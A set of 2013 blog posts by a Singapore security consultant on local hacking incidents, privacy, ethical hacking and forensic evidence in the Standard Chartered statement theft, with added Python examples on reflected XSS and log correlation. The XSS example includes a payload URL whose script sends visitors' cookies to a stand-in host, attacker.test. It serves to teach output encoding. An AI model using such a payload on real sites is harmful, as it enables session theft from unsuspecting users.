Government Ware, or GovWare, is an annual security conference organized by agencies of the Singapore Government to showcase the latest cyber security talks, booths, vendors and products. This year's theme was 'Building a Secure Smart Nation', and it was held at Suntec Singapore. This is one of the conferences to go to, both to check out the competition and to network!
A bookworm who loves cyber security. A sucker for hacker and security conferences. Loves attending and promoting conferences and has spoken at multiple conferences globally (almost). Interests include cyber threat intelligence, cyber 'warfare', cyber 'terrorism' and cyber conflict.
Showing posts with label government.
Sunday, 25 October 2015
Monday, 30 December 2013
2014 - The Year of Privacy?
2012 was a year famous for the number of security breaches. Companies from Sony to Yahoo to Google inadvertently had their users' personal data leaked. Most of these breaches were server-side compromises.
Source: http://venturebeat.files.wordpress.com/2012/09/securitybreaches_25.png
2013, on the other hand, was labelled the year of the hack. As early as March 2013, companies from Apple to Facebook and Twitter got hacked, and that does not include the hacking incidents in Singapore.
For Singapore, 2013 was a record year for hacking incidents: the hack on the website of Kong Hee's wife, Anonymous threats against the Singapore Government, the XSS attacks on the PMO and Istana websites, the defacement of Singapore school websites, the hack of the Singapore Art Museum website with personal information leaked, and most recently the theft of the bank statements of high-profile Standard Chartered clients.
Kong Hee's Wife Website Hacked
AMK Town Council Website Hacked
Anonymous Threats and Hacks in Singapore
Source: http://singapore.coconuts.co/2013/10/31/video-anonymous-hacktivists-warns-singapore-government
Singapore Art Museum Website Hacked
Singapore Schools Websites Hacked
Standard Chartered Clients Statements Stolen
Source: http://www.todayonline.com/singapore/standard-chartered-clients-monthly-bank-statement-stolen
With such a record number of hacking incidents, 2013 will be known as the year Singapore got hacked the most: the year many security professionals, from private organizations to government, were placed on high alert and standby. It was indeed a tough year for security professionals in Singapore.
So what will 2014 be?
A preview of what is going to happen was shown throughout 2013. Privacy has been another hot topic besides hacking: the case of Edward Snowden leaking files from the NSA that revealed the US government spying on its citizens, the security of encryption keys, the spying on Malaysia by Singapore, the spying on Indonesia by Australia, and the privacy of consumers against telemarketers.
The Serious Leaks by Snowden
The Allegations against Encryption Companies
Source: http://www.theguardian.com/world/2013/dec/20/nsa-internet-security-rsa-secret-10m-encryption
The Spying of Indonesia by Australia
The Spying Report of Malaysia by Singapore
Source: http://www.reuters.com/article/2013/11/26/us-malaysia-singapore-spying-idUSBRE9AP03P20131126
PDPC Backfires on Consumer's Privacy
All of these are previews of what may happen and will be the hot topics of discussion for 2014. While hacking will not stop, I predict that 2014 will be the year of privacy: the year consumers question the privacy of their data and personal information, the year companies start concerning themselves with the security of their clients' data, and the year security vendors get the most calls about privacy concerns and solutions.
Even security rockstar Bruce Schneier, in his interview with 'Motherboard', said the following about the security of our data:
"I'm worried about governments, the US and other governments. I'm worried about how they are using our data, how they're storing our data, and what happens to it. I'm less worried about the criminals. I think we've kinda got cyber-crime under control, it's not zero but it never will be. I'm much more worried about the powerful abusing us than the un-powerful abusing us."
So in summary:
2012: the year of Security Breaches
2013: the year of the Hack
2014: the year of Privacy (just a prediction)
Thursday, 12 December 2013
Cyber Security in Singapore - Opinions
Recently I was invited by a local radio station to give a talk about cyber security in Singapore, but due to company and legal reasons I had to decline the opportunity. Nonetheless, these were the questions I was supposed to answer during the talk show.
1) Cyber security in Singapore - have the recent hacking episodes exposed a "weakness" in Singapore's cyber security?
I wouldn't call it a weakness but an eye-opener as to what else could be done by skilful hackers. In the 1983 hacking movie 'WarGames', the hacker David Lightman says 'I don't believe that any system is totally secure' when told that it was impossible to gain access to the system. Taking that quote, I believe there is no way to say that a system, a server or a website is 100% secure. There will always be a potential issue: a backdoor, a security misconfiguration, a missing or outdated patch that can be taken advantage of and exploited. Before the much-talked-about hackings of government sites lately, back in 2011, 17 of our government sites were defaced by a hacker group called Brazil Hack Team, and fortunately that was all they were able to do. The so-called hacking of the Istana and PMO websites was not really a hack. It was a client-side exploitation of a vulnerability called XSS, or Cross Site Scripting, which does not affect the server side; the confidentiality, integrity and availability of the PMO's and Istana's servers were maintained. In other words, nothing was leaked or compromised on the server. The caveat is that a reflected XSS still runs attacker-chosen script in the visitor's browser under the site's own origin, so it can be used to alter what a victim sees, phish them or steal their session, which is why it is fixed by encoding untrusted input when it is written into the page.
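To make the XSS point concrete, here is an added example (not code from the original post and not the code of any government site) of a hypothetical search page that reflects its "q" parameter back into the response. The vulnerable render echoes the decoded value as-is; the hardened render HTML-encodes it and adds a Content-Security-Policy as defence in depth. The page template, URLs and attacker payload are all constructed for illustration.

```python
# Added example, not code from the original post or from any government site:
# a hypothetical search page that reflects its "q" parameter, shown in its
# vulnerable form and its hardened form. URLs, page template and payload are
# constructed for illustration.
import html
from urllib.parse import parse_qs, urlsplit

# Hypothetical page template; the untrusted value lands in element content.
PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"


def _query_param(url: str, name: str = "q") -> str:
    """Extract and percent-decode one query parameter from a request URL."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def vulnerable_render(url: str) -> str:
    """Reflected XSS: the decoded parameter is echoed into the HTML as-is,
    so a crafted link makes the site serve the attacker's script to whoever
    clicks it. The server itself is not modified, which is the author's point."""
    return PAGE.format(q=_query_param(url))


def hardened_render(url: str) -> str:
    """Same page with output encoding: html.escape turns <, >, &, " and '
    into entities so the browser renders the payload as text, not markup."""
    return PAGE.format(q=html.escape(_query_param(url), quote=True))


def hardened_headers() -> dict:
    """Defence in depth for the hardened page: a CSP that refuses inline
    script means even a missed encoding sink cannot run injected code."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show the difference between the two renders."""
    return "<script" in page.lower()


# Constructed attacker link. The decoded q value is:
# <script>document.location='https://attacker.test/?c='+document.cookie</script>
PAYLOAD_URL = (
    "https://example.test/search?q=%3Cscript%3Edocument.location%3D%27https"
    "%3A%2F%2Fattacker.test%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)
BENIGN_URL = "https://example.test/search?q=wargames"

if __name__ == "__main__":
    print("vulnerable:", vulnerable_render(PAYLOAD_URL))
    print("hardened:  ", hardened_render(PAYLOAD_URL))
```

html.escape is the right encoder for element content and quoted attribute values; a value written into a JavaScript string, a URL or a CSS rule needs the encoder for that context instead, and the CSP is there to catch the sink that gets missed.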
2) As an Ethical Hacker and Security Consultant, what do you think are the challenges in cyber security here, and worldwide?
One of the challenges that we face, not just in Singapore but also in other countries, is investment in cyber security. Singapore, like the USA and Israel, has invested billions in physical military warfare but not much in the technology and manpower of a cyber military. In my opinion, we should invest not just in F-16 jets but also in the technology and skills that could potentially bring down an F-16 jet using a laptop. When I went to a security conference in Amsterdam, a hacker showed how he could potentially hack the control systems of an airplane. If we think that is far-fetched, in 2011 hackers from China managed to hack and control a NASA satellite for approximately 11 minutes. Needless to say, when it comes to hacking, nothing is impossible.
Another thing is skillset. Before 2007, local institutions, polytechnics and universities did not have courses involving ethical hacking. These ethical hacking courses were mostly seen in private institutions. In the US, schools are established for future and potential hackers: hacker schools and hacking academies are created so that students are trained from young. In India, for example, students are exposed to security at a young age, and you have people like Ankit Fadia, an Indian hacker who published a book on ethical hacking at the age of 16. However, I am glad that the government understands the gravity of the importance of cyber security, and since mid-2007 ethical hacking modules and courses have been introduced in the majority of local institutions. The graduates from these faculties will be the ones who safeguard our network and infrastructure.
The third thing is security education and conferences. In Singapore there are not many security conferences that are open to the public. There is one held annually here called SyScan, and I believe that such a conference benefits the security community in Singapore. There are also other conferences such as GovWare, but such government-sponsored conferences are not open to the public and can be expensive at times. If we look at countries such as the US, those in Europe and even Malaysia, there are a number of conferences held every year that are affordable and open to the public. Singapore must learn from such countries and organize more conferences open to the public that can educate people in security awareness and the importance of the roles they play in their organizations. Remember that security is a shared responsibility.
3) Are companies here prepared to deal with cyber challenges? Why or why not?
As long as a company invests in cyber security, I believe it is more or less prepared for potential cyber challenges. Whenever there is a hacking incident, security officers and management will question three important things: whether the confidentiality, the integrity and the availability of the information were compromised. Therefore, even if the website got defaced, at least the information or data were not compromised, stolen or leaked. A defacement is, however, an integrity compromise of the site in its own right and usually means the attacker had write access to the web server, so it should be investigated as a server-side compromise until the logs show otherwise.
4) What have been your experiences in ethically "hacking" company sites? What more can be done?
One of the most important things before ethically hacking company sites or servers is to ensure we have agreed on the rules of engagement, the dos and the don'ts. Trust is a very important matter. Just imagine if we are able to compromise a credit card database; this is where the word ethical comes into hacking. Such major findings are reported to the stakeholders, and we assist them with recommendations on how to remediate them. Security managers in organizations must also understand the difference between a vulnerability assessment and a penetration test. Both may sound similar but are totally different when applied: a vulnerability assessment enumerates and rates weaknesses, usually with scanners and without exploiting them, whereas a penetration test goes on to exploit them to demonstrate what an attacker could actually reach.
Companies can additionally invest in security services that perform vulnerability assessments and risk analysis on a periodic basis, rather than doing them only because their policies and audit requirements demand it.
Labels: assessments, challenges, computer, conference, cyber challengers, cyber security, ethical hacker, government, hacking, organizations, penetration testing, security, security consultant, singapore, weakness
Friday, 6 December 2013
Standard Chartered 'Hacked'
Hack, Evidence, Prosecution, Processes, Trust and Moving on.....
In a recent incident involving James Raj, allegedly known as The Messiah, Standard Chartered client statements were found on James Raj's laptop. This quickly led readers to turn their anger on the Anonymous group that James Raj was supposedly part of.
While we have no visibility as to how the data got onto James Raj's laptop, one thing I would question is the evidence gathered. It is not simply about blaming him because the data was on his laptop. Investigators must find evidence that illustrates that it was indeed James Raj who stole the information. This must be in the form of logs from both the laptop and Fuji Xerox. A company like Fuji Xerox would surely have log collection and management in place, and investigators must ensure that the logs tally, confirming that there was indeed a network connection made from James Raj's IP address to Fuji Xerox's server.
Cyber forensic investigators must also be able to retrieve the logs from the laptop, not just to confirm that his laptop was used but to confirm that no other connections were made from other sources to James Raj's machine that could have used it as a proxy to attack FX. The timing of the connections must be in sync on both sides. The metadata of the logs must not be tampered with (especially by amateur evidence handlers).
Below is a high level graphical example as how James Raj's machine could be used in the stealing of data.
How could this be possible?
During #OpTunisia there were a lot of protests against the Tunisian government, which led to outsiders wanting to take part as well. As they were outside Tunisia, they relied on the internet to voice their unhappiness with the Tunisian government. Government websites were hacked and defaced (no information was stolen) by hackers. The Tunisian government fought back by blocking all connections from outside Tunisia to the government websites. A hacker known as Sabu managed to find a Tunisian citizen's machine to use as a proxy to connect to the government website. All he had to do was connect to that machine as a proxy and attack the Tunisian government website from there. Reports stated that, due to the small pool of experts in handling such incidents, the owner of that machine was arrested while the hacker went free.
Source: the book 'We Are Anonymous' by Parmy Olson, pages 143-146
Lesson that we can Learn
Skilful hackers do not connect to and hack the target directly from their own machines, and that does not mean that n00b hackers do not know how to hide their tracks as well. Investigators need to identify and preserve the logs properly and securely, and ensure that the evidence is in no way tampered with during the course of the investigation. These logs must exist on both the machine and the server to show that the connections made are real and that the two records are in sync. If logs or files are suspected to have been deleted, investigators should take a forensic image of the entire hard disk, run a data recovery tool against the image and identify the evidence from there. The operating system itself should be checked for whether services such as telnet or other remote shells were listening, or whether exploitable vulnerabilities were present. This could be further evidence that James Raj's laptop was already exposed to other machines connecting to it, possibly using his machine to leverage the attack. Only when all of this has been gathered will the public be confident in the methodologies, processes and techniques used to collect the evidence, and that every possibility of an external party using Raj's machine as a proxy has been covered.
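The two checks argued for above, that the server's records and the laptop's records tally in time, and that nobody else had a session into the laptop when the connections were made, can be expressed as a small correlation script. The following is an added example, not from the original post and not from any real investigation: the log formats, the IP addresses (documentation ranges) and the timestamps are all constructed, and the real Fuji Xerox and laptop logs will look different. The server address and the suspect's address are passed in as parameters.

```python
# Added example, not from the original post or from any investigation record:
# correlating a server's access log with a suspect laptop's connection log.
# Log formats, IP addresses (documentation ranges) and timestamps are all
# constructed for illustration.
from datetime import datetime, timedelta

# Constructed server access log: "<utc time> <client ip> <method> <path> <status>"
SERVER_LOG = """\
2013-11-12T02:14:07Z 203.0.113.45 GET /statements/export 200
2013-11-12T02:14:09Z 203.0.113.45 GET /statements/export 200
2013-11-12T09:30:00Z 203.0.113.45 GET /statements/export 200
""".splitlines()

# Constructed host connection log from the laptop:
# "<utc time> <IN|OUT> <src ip:port> -> <dst ip:port>"
LAPTOP_LOG = """\
2013-11-12T02:13:58Z IN 192.0.2.77:41000 -> 203.0.113.45:23
2013-11-12T02:14:06Z OUT 203.0.113.45:51234 -> 198.51.100.10:443
2013-11-12T02:14:08Z OUT 203.0.113.45:51235 -> 198.51.100.10:443
""".splitlines()


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_server(lines):
    out = []
    for line in lines:
        ts, ip, method, path, status = line.split()
        out.append({"ts": parse_ts(ts), "ip": ip, "path": path, "status": int(status)})
    return out


def parse_laptop(lines):
    out = []
    for line in lines:
        ts, direction, src, _, dst = line.split()
        remote, local = (src, dst) if direction == "IN" else (dst, src)
        r_ip, r_port = remote.rsplit(":", 1)
        _, l_port = local.rsplit(":", 1)
        out.append({"ts": parse_ts(ts), "dir": direction, "remote_ip": r_ip,
                    "remote_port": int(r_port), "local_port": int(l_port)})
    return out


def correlate(server, laptop, server_ip, suspect_ip, tolerance=timedelta(seconds=5)):
    """Pair each server request from suspect_ip with one outbound laptop
    connection to server_ip whose timestamp is within `tolerance` (allowed
    clock skew between the two sources). Each laptop connection is used at
    most once. Returns (matched pairs, server requests with no laptop record)."""
    candidates = [e for e in laptop if e["dir"] == "OUT" and e["remote_ip"] == server_ip]
    used, matched, unmatched = set(), [], []
    for req in (r for r in server if r["ip"] == suspect_ip):
        hit = next((i for i, c in enumerate(candidates)
                    if i not in used and abs(req["ts"] - c["ts"]) <= tolerance), None)
        if hit is None:
            unmatched.append(req)
        else:
            used.add(hit)
            matched.append((req, candidates[hit]))
    return matched, unmatched


def inbound_before(laptop, ts, window=timedelta(minutes=5)):
    """Inbound connections accepted by the laptop in the window before `ts`:
    evidence that a third party could have been driving the machine as a
    proxy (a remote shell on port 23 is the classic case)."""
    return [e for e in laptop if e["dir"] == "IN" and ts - window <= e["ts"] <= ts]


def summarize(server_lines, laptop_lines, server_ip, suspect_ip):
    server, laptop = parse_server(server_lines), parse_laptop(laptop_lines)
    matched, unmatched = correlate(server, laptop, server_ip, suspect_ip)
    proxied = [(req, inbound_before(laptop, req["ts"])) for req, _ in matched]
    return {
        "matched": len(matched),
        # Requests the server saw but the laptop did not: missing or deleted
        # laptop logs, or the address was used from somewhere else.
        "unmatched": [r["ts"].isoformat() for r in unmatched],
        # Matched requests preceded by an inbound session on the laptop.
        "possible_proxy": [r["ts"].isoformat() for r, inb in proxied if inb],
    }


if __name__ == "__main__":
    print(summarize(SERVER_LOG, LAPTOP_LOG, "198.51.100.10", "203.0.113.45"))
```

On the constructed data the two early exports tally with outbound connections from the laptop, the 09:30 export has no laptop record at all, and both matched exports were preceded by an inbound telnet session from a third address, which is exactly the proxy scenario the post describes. The tolerance must come from a measured clock offset between the two sources, not be widened until things match, and the laptop side should be parsed from the forensic image rather than the live machine.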
Recent News may give Govt a Hard Time
Recent news about a government chemist in the States who was found guilty of tampering with evidence, which resulted in many innocent people going to jail, will definitely have many questioning the genuineness of the evidence and the prosecution of James Raj, should he be found guilty of the charges against him.
Moving Forward
The way for organizations and companies to know whether they are ready for such an attack is to perform vulnerability assessments on their networks and servers. Only then will they know how they would fare against a potential attack. One of the mistakes organizations make is trusting their own security department to handle such assessments, but as they always say, it is better to have a new pair of eyes to see what the internal team may be blind to (much like an audit). Hire ethical hackers/pentesters to simulate a real-world attack on your servers and networks and see how deep they can penetrate. Of course, rules of engagement and a non-disclosure agreement must be in place to maintain the confidentiality and integrity of the assessment for both parties involved.